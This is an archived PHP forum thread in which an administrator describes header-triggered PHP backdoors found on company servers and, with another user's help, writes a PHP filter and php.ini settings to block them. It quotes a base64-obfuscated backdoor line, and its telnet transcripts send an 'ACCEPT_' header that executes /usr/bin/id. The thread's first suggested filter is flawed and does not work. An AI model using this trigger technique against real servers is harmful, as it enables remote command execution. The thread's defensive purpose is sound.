jeev Posted November 12, 2007 Share Posted November 12, 2007 so i do free lance administration, i really dont know much about coding in PHP but i can figure some out. i've set up monitoring scripts on all 200 servers and they're a pretty big adult company.. they have an in house programmer, he's good.. but somethings just keep getting through. this is the second time.. the first 100 times i found r57 shell and stuff like that on the servers. now i'm finding these: $verify_member = getenv(base64_decode("SFRUUF9BQ0NFUFRfU0lMVkVSVEVBTQ==")); i guess that pretty much comes out to ACCEPT_SILVERTEAM and i've tested it.. you can force a lot of things with that.. example: $ telnet www.x 80 Trying x... Connected to x. Escape character is '^]'. GET /treepad/pics/temp/lol.php HTTP/1.1 Host: www.x ACCEPT_xfiles: /usr/bin/id HTTP/1.1 200 OK Date: Sun, 22 Jul 2007 06:29:15 GMT Server: Apache/2.0.54 (Fedora) X-Powered-By: PHP/5.0.4 Content-Length: 62 Connection: close Content-Type: text/html uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv) that was the first script, second one was the same pretty much.. you can pass, have it download.. blah blah more backdoors. how do i prevent this? other than good coding? a) i dont think they use base64 decode so i'd like to disallow that i think, i can pass that in php.ini I recall.. but how do i stop "ACCEPT_" type commands thanks in advance Link to comment https://forums.phpfreaks.com/topic/76953-solved-hacked-issues-with-denying-certain-functions/ Share on other sites More sharing options...
trq Posted November 12, 2007 Share Posted November 12, 2007 I'm not sure I understand this well enough to help much, but you could quite easily create a script that searches the $_REQUEST array looking to see if it hold an ACCEPT_* key. <?php foreach ($_REQUEST as $key) { if (substr($key,0,6) == 'ACCEPT_') { die(); } } ?> I'm really not sure this will help, but it may be a start. Link to comment https://forums.phpfreaks.com/topic/76953-solved-hacked-issues-with-denying-certain-functions/#findComment-389697 Share on other sites More sharing options...
jeev Posted November 12, 2007 Author Share Posted November 12, 2007 thank you so much but i wouldn't even know where to begin with what you gave me... i really do not understand it.. i just would like to know how i could prevent ACCEPT_ from being passed and accepted in PHP... but first thing i'm gonna do is deny base64_decode. Link to comment https://forums.phpfreaks.com/topic/76953-solved-hacked-issues-with-denying-certain-functions/#findComment-389699 Share on other sites More sharing options...
trq Posted November 12, 2007 Share Posted November 12, 2007 Well, providing I'm on the right track... the easiest approuch would be to place the snippet I provided in a file /usr/local/deny_accept.php And then add the line.... auto_prepend_file "/usr/local/deny_accept.php" to your php.ini. Like I said, Im not 100% sure this would work, but it may be worth at least showing your programmer my idea. Link to comment https://forums.phpfreaks.com/topic/76953-solved-hacked-issues-with-denying-certain-functions/#findComment-389723 Share on other sites More sharing options...
jeev Posted November 12, 2007 Author Share Posted November 12, 2007 ahh, wow. i will try it tomorrow morning and let you know. thank you so much Link to comment https://forums.phpfreaks.com/topic/76953-solved-hacked-issues-with-denying-certain-functions/#findComment-389734 Share on other sites More sharing options...
jeev Posted November 12, 2007 Author Share Posted November 12, 2007 :/ i tried it and it still goes. i had verified auto_prepend_file ... was working properly, permissions were wrong initially but they load now.. it doesn't stop it Escape character is '^]'. GET /members/j.php HTTP/1.1 Host: x ACCEPT_SILVERTEAM: /usr/bin/id HTTP/1.1 200 OK Date: Mon, 12 Nov 2007 17:09:40 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.7 X-Powered-By: PHP/4.4.7 Transfer-Encoding: chunked Content-Type: text/html 27 uid=80(www) gid=80(www) groups=80(www) 0 Link to comment https://forums.phpfreaks.com/topic/76953-solved-hacked-issues-with-denying-certain-functions/#findComment-389979 Share on other sites More sharing options...
jeev Posted November 12, 2007 Author Share Posted November 12, 2007 <?php $headers = apache_request_headers(); foreach ($headers as $key => $value) { if (strtoupper(substr($key, 0, 7)) === 'ACCEPT_') { die(); } } ?> --- that worked! also, disable_functions = shell_exec and base64_decode.. we dont use base64_decode.. so i put that for now and i'm leaving the prepend out till i can make sure it doesn't break the whole environment. it's over 150 servers so.. base64_decode is fine for now cause it is not used anywhere else. Link to comment https://forums.phpfreaks.com/topic/76953-solved-hacked-issues-with-denying-certain-functions/#findComment-390017 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.